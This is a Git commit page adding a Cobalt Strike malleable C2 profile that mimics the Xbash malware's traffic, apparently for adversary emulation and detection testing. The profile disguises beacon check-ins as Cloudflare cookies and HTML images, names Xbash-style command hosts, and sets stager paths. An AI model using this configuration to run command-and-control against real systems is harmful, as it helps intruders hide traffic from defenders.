infosecn1nja
/
Malleable-C2-Profiles
mirror of https://github.com/infosecn1nja/Malleable-C2-Profiles.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create xbash.profile

master
xx0hcd 2018-09-27 13:10:13 -05:00 committed by GitHub
parent b4fbc4c51b
commit d57e61d7ef
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 158 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

158
crimeware/xbash.profile Normal file
View File

@ -0,0 +1,158 @@
#xbash malware profile
#https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/
#https://www.hybrid-analysis.com/sample/9ee6d5b27ed8a4d67181a82b2df1a1f45409652eec096455a9beb7a3b7031b34?environmentId=100
#sample = 725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct
#xx0hcd
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET4.0E; QQBrowser/7.0.3698.400)";
set dns_idle "8.8.8.8";
set maxdns "235";
set sample_name "xbash profile";
#prob not using ssl if testing malware traffic.
#https-certificate {
# set keystore "demo.store";
# set password "whateverpass";
#}
#prob have to change Host header to something legit depending on testing.
http-get {
set uri "/m.png";
client {
header "Host" "png.realtimenews.tk";
header "Connection" "Keep-Alive";
metadata {
base64;
prepend "__cfduid=";
header "Cookie";
}
}
server {
header "Server" "cloudflare";
header "Content-Type" "text/html; charset=utf-8";
header "Connection" "keep-alive";
header "Content-Security-Policy" "default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'";
header "X-Github-Request-Id" "7184:5EA1:1693DD4:1EEFFEA:5B9FC138";
header "Via" "1.1 varnish";
header "X-Served-By" "cache-hhn1544-HHN";
header "X-Cache" "MISS";
header "X-Cache-Hits" "0";
header "CF-RAY" "45bc6f44849e9706-FRA";
#using newline ("\n") shows as a period (".") in c2lint, but looks correct in wireshark.
output {
base64;
prepend " <img width=\"32\" height=\"32\" title=\"\" alt=\"\" src=\"data:image/png;base64,\n";
prepend "<a href=\"/\" class=\"logo logo-img-1x\">\n";
prepend " <head>\n";
prepend "<html>\n";
prepend "<!DOCTYPE html>\n";
prepend "239c\n";
append "</a>\n";
append "</html>";
print;
}
}
}
http-post {
set uri "/domain/all";
client {
header "Host" "scan.censys.xyz";
header "Accept-Encoding" "identity";
header "Accept-Language" "en-US,en;q=0.8";
header "Accept" "*/*";
header "Accept-Charset" "ISO-8859-1,utf-8";
# header "Content-Type" "application/x-www-form-urlencoded; charset=UTF-8";
output {
base64;
prepend "__cfduid=";
header "Cookie";
}
id {
base64url;
parameter "c";
}
}
server {
header "Server" "cloudflare";
header "Content-Type" "text/html; charset=utf-8";
header "CF-RAY" "455f7b1280ac5368-MIA";
output {
netbios;
prepend "imusee.net";
prepend "iamnotthisold.net\n";
prepend "hsdoor.net\n";
prepend "ingramsoftware.net\n";
prepend "houjin-card.net\n";
prepend "huiego.net\n";
prepend "himanshutyagi.net\n";
prepend "innostudio.net\n";
prepend "herosandcons.net\n";
prepend "indigolightstudios.net\n";
prepend "huishubao.net\n";
prepend "1635\n";
print;
}
}
}
http-stager {
set uri_x86 "/port/tcp8080";
set uri_x64 "/cidir";
client {
header "Host" "png.realtimenews.tk";
header "Connection" "Keep-Alive";
}
server {
header "Server" "cloudflare";
header "Content-Type" "text/html; charset=utf-8";
header "CF-RAY" "455f7b1280ac5368-MIA";
}
}
stage {
set checksum "0";
set compile_time "12 Jun 2018 11:22:23";
set image_size_x86 "559966";
set image_size_x64 "559966";
}